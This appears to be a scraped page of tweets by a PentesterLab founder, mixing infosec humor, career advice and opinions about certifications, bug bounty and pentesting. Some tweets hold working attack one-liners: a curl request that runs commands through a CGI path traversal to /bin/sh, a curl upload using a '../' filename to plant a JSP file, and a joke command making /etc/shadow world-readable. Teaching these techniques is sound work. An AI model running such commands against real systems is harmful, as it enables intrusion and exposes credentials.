Founder/CEO/Trainer/Researcher/CVE archeologist @PentesterLab. Security engineer. Bugs are my own, not of my employer...

As an engineer, I ❤️ clever engineering. Ruby on Rails relies on signed sessions (AES GCM). They are secure, but there is a catch: you cannot invalidate them early. You have to wait for expiry. Workarounds exist, like caching sessions you want to kill, but nothing universal.
2
8
54
12,921
By age 30, You Should Have a Drawer with a Raspberry PI you don't use and a dozen USB cables.
479
976
14,056
I saw a guy reporting a vulnerability today. No logo. No website. No drama. He just emailed a write-up. Providing all the details needed to reproduce and fix the issue. Like a psychopath.
53
833
5,030
I can't wait to open this one for Christmas!
39
230
1,834
235,069
Get the latest Windows security enhancements on Linux with this one simple trick: # chmod 755 /etc/shadow
21
236
1,226
This book has a lot of typos, a few sections that have definitely been written using AI but this takes the cake...
24
51
1,241
51,507
Christmas gift for your blue team friends
23
206
1,115
100,894
Certifications.
What’s the biggest scam in tech that has become widely accepted?
20
109
1,050
90,812
9
108
791
107,238
KISS: curl --data "echo;id" 'http://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
15
202
832
A lot of people working in infosec often forget how lucky they were that their passion became a job in high demand...
33
85
766
I know sex is great but have you ever shell'd a company after they insisted the pentest was a waste of time...
24
52
723
Metasploit is written in Ruby. #infosec: we should all learn Python.
40
49
709
162,510
You need a degree, 5 years experience and 2 certifications to become a cybercriminal.
41
62
666
Just popped a shell? Run this command to increase the impact of your finding: export PS1="# " #bugbountytips
7
78
596
People who get SANS training
Charlie Light
19
67
585
92,122
"Yes, the 3 types of hackers: blackhat, whitehat and asshat..."
14
71
529
This is a weird screensaver and not at all the one I downloaded...
21
44
541
Replying to @fr0gger_
6
23
585
41,935
A wise hacker once said: "you don't call yourself a hacker, other people do".
15
89
520
Everybody wants to be a hacker until it’s time to read/write code for few hours...
27
116
485
Are we going back to IRC?
64
25
443
85,052
Cyber security students be like: "If I win the lottery, I’m not telling anyone. But there will be signs."
11
45
450
42,761
How to Learn hacking in 30 Days? 🧵👇
56
78
446
The world needs an old-school CTF... So far the challenges are: - Read this 5.25" floppy - Read this 3.5" floppy - Burn a CD - Crimp your own ethernet cable - Deploy a Peg DHCP server (tools.ietf.org/html/rfc2322) - Connect to this token ring network Anything else?
200
74
432
Unpopular opinion: No one will be work as a "pentester" in a few years. People will perform pentest as part of their job as a security engineer, appsec engineer or redteamer. It has already started.
55
52
413
$20K/mo is where your hacker life changes the most. •Stop beg bounty. •Buy one of the VPNs advertised by your favorite influencer. •Start hacking from an iPad Pro. •Go to BlackHat and RSA without speaking there. •Buy SANS courses
19
11
377
41,251
Infosec: "People sucks at threat modelling" Also infosec: "An attacker spends millions for a Super Bowl ad to get me to scan a QR code"
15
34
316
Too many people fall into the traps of gamification or certification, focusing on the wrong objectives. Your goal should be to learn, not to be at the top of the leaderboard or merely to pass an exam. [1/2]
9
67
331
100,888
9 years ago, between Christmas and New Year, I started what will become @PentesterLab
25
8
346
Don't focus on tools, focus on techniques!
10
71
349
Entertain your blue team with this amazing screensaver:
10
38
324
43,369
Blackhat swag as seen by people outside of infosec: "This person is definitely a badass hacker". Blackhat swag as seen by people in infosec: "This person is most likely not doing any hacking".
15
26
312
TIL: How to exploit directory traversal in file upload with #curl using curl -F "file=@PentesterLab.jsp;filename=../../../../../../../../hacker.jsp"
2
112
339
Hackers: 25 years later. Zero Cool manages a team of pre-sales engineers solving APT. Acid Burn and Lord Nikon are both CISO. Cereal Killer works for the government. Joey Pardella is trying to cover up a security breach. They are all #infosec thought leaders on twitter.
9
79
317
Recent photo of me getting ready to start reviewing code
4
23
300
If you're looking for a job, try to blog regularly about CVEs (one you didn't find): 📚 You will learn so much ✍️ You will have something to show for it 🆓 It is completely free (unlike certifications🤔) 🎲 It removes the randomness out of your study/content (finding the bug)
7
37
280
59,956
Junior pentesters when a bunch of internal pentests gets allocated to the team
Stan Price
5
36
278
30,534
I’ve spent 2 solid hours doing bug bounty and I still haven’t made $200k. Can someone tell me what I’m doing wrong? #bugbountytips
32
15
285
27,097
Security recommendation: Use bcrypt for passwords Implementation:
17
35
269
They call me 007...
5
31
263
15,185
Metasploit: $0 Exploiting known unpatched vulnerabilities: $0 Leveraging public security research: $0 Deploying 0-dayz to compromise random phones using public USB power charging stations: $3000000 Someone who is good at the economy help me budget this my APT group is dying.
3
42
256
“Hacking cannot be taught. Hacking can only be learned.” (based on a quote from Mikhail Botvinnik about Chess)
8
53
257
For people being surprised to see so many security tools in the twitch leak... This is what a modern security team looks like. Less buying off-the-shelf tools, more building tools based on your actual needs. 🛠🧰💰
12
30
260
The "S" in Vibe Coding stands for Security.
9
36
254
16,934
Do you want to find new vulnerabilities? 1. Look at the patch for a recent CVE (for example: CVE-2021-43350) 2. Write a @semgrep rule for them (tune your rule using the CVE you picked) 3. Scan a lot of code repository with this rule. 4. Manually confirm the matches.
4
64
255
Lol... good luck!
9
3
235
I couldn't resist...
11
14
235
Troll bug bounty hunters with this one mad trick: str.gsub!('${7*7}', '49')
9
35
241
Do not get into hacking. I cannot emphasize this hard enough. Do not ever start hacking.
36
17
219
Checkmate!
16
63
214
“We take security seriously...” A   B     s      o      l    u      t      e     l    y    n o t ・ 。 ・゚ 。°*. 。*・。
3
42
216
14,250
When people subscribe to @PentesterLab, they give me two things... Their $ and their time, I can't refund the latter and that's why I try to provide a lot of value...
8
11
226
Between me and the @RedTeamVillage_ there should be around 2000 of those at defcon!
19
16
213
24,485
No need to sign your JWT, we are all friends here on the Internet!
4
13
199
Pentesters: “Bug bounties involve too much grinding for unpredictable outcomes.” Also pentesters: “I want to become a vulnerability researcher.”
8
20
196
19,269
You shout "Hack the planet" but your behaviour screams "Run a vulnerability scanner against Earth".
4
28
190
Unpopular opinion: A lot of people stick to CTF instead of Bug Bounty or Vulnerability Research because it is a lot more comfortable. Not easier, more comfortable, you know there is something to be found.
23
29
197
33,802
Give a man an open redirect, and you feed him for a day. Teach a man to chain open redirects with other bugs, and you feed him for a lifetime.
7
25
198
One day I will understand why most of infosec picked Python...
34
6
184
I made a bug bounty bingo card (with a shameless @PentesterLab plug)!
10
41
188
I remember trying to learn Linux by printing pages and pages of Mandrake/RedHat manuals and trying to read them... THAT DID NOT WORK. What worked? Using Linux as my daily driver for months. It was hard, it was annoying, it was frustrating but this was the way.
16
11
179
Not that it matters but since I saw another tweet on this: I have 0 CVE, 0 certification. People judging others on CVE or certs are at best lazy, at worst downright stupid...
13
21
178
There is one way to get better at hacking, it's hacking!
10
15
177
Who will be the first person to pass their OSCP naked?
18
35
166
You are offered 20k. But you can never use Burp Suite again. Do you accept?
81
3
167
106,907
It's important to remember that some infosec influencers are not achieving much and that a few infosec people with < 100 followers are killing it.
10
17
172
This is going viral so I'm sharing my "drawer"
8
4
160
Thank you people writing PHP
5
2
173
35,286
See mum! It is a real job!
Our booth at CyberSec Asia
8
2
164
12,385
One man's shell is another man's incident.
6
39
162
This one seems very relevant to security/hacking: "It doesn’t matter if you’re a beginner or an expert as long as you’re on the path. If a beginner is on the path, all they need is time. If an expert is off the path, they won’t be an expert for long." –@JamesClear
2
32
163
I'm lucky to be working on some of the hardest Computer Science problems of our time... Like aligning text in CSS...
8
13
162
One of the cheapest and most efficient way to improve your infosec skills is to read code. Literally, linux+vim+git on a raspberry pi with a 12” display is enough... Read the code of opensource projects, tools you use, diff from advisories. You don’t even need a browser!
5
22
156
"Do you need to learn to write code to get a job in infosec?" Absolutely not! You need to learn to write code because that is one of the coolest things you can do with a computer.
8
21
146
HODL
7
16
142
This is very cool! (it's for a ridiculously simple patch in the Linux kernel)
6
6
149
Let's all agree: Hacker skills == Number of followers. 👹👹👹👹
18
7
151
I make a living teaching how to hack JWT, I will even run a workshop at Defcon on hacking JWT. If you are a developer and your application uses JWT spend 5 minutes and watch this video!
Level up your #AppSec skills with our new video on JSON Web Tokens (JWT)! Join us as we share six practical tips to enhance your security practices. Arm yourself with these insights today! Watch, learn, apply! 🔒🎥💡 piped.video/f6c0TeQSHDg
27
147
34,535
Two years full-time on @PentesterLab... Time flies.
14
2
150
1. Take screenshot of desktop. 2. Use screenshot as screensaver/lock screen. 3. Leave laptop "unlocked" in public places. 4. Wait for outrage or LinkedIn thoughtleadership
3
7
136
I cooked a beef bourguignon today. After a few hours cooking, the meat is falling appart like a pentest boutique that just got acquired.
11
9
133
Your script kiddie name is your first name followed by your last name.
9
10
125
23,493
My kids think I have the best job: My job is to send stickers to people all around the world.
15
4
133
Chat, are we cooked?
We just shipped automated security reviews in Claude Code. Catch vulnerabilities before they ship with two new features: - /security-review slash command for ad-hoc security reviews - GitHub Actions integration for automatic reviews on every PR
13
9
135
20,782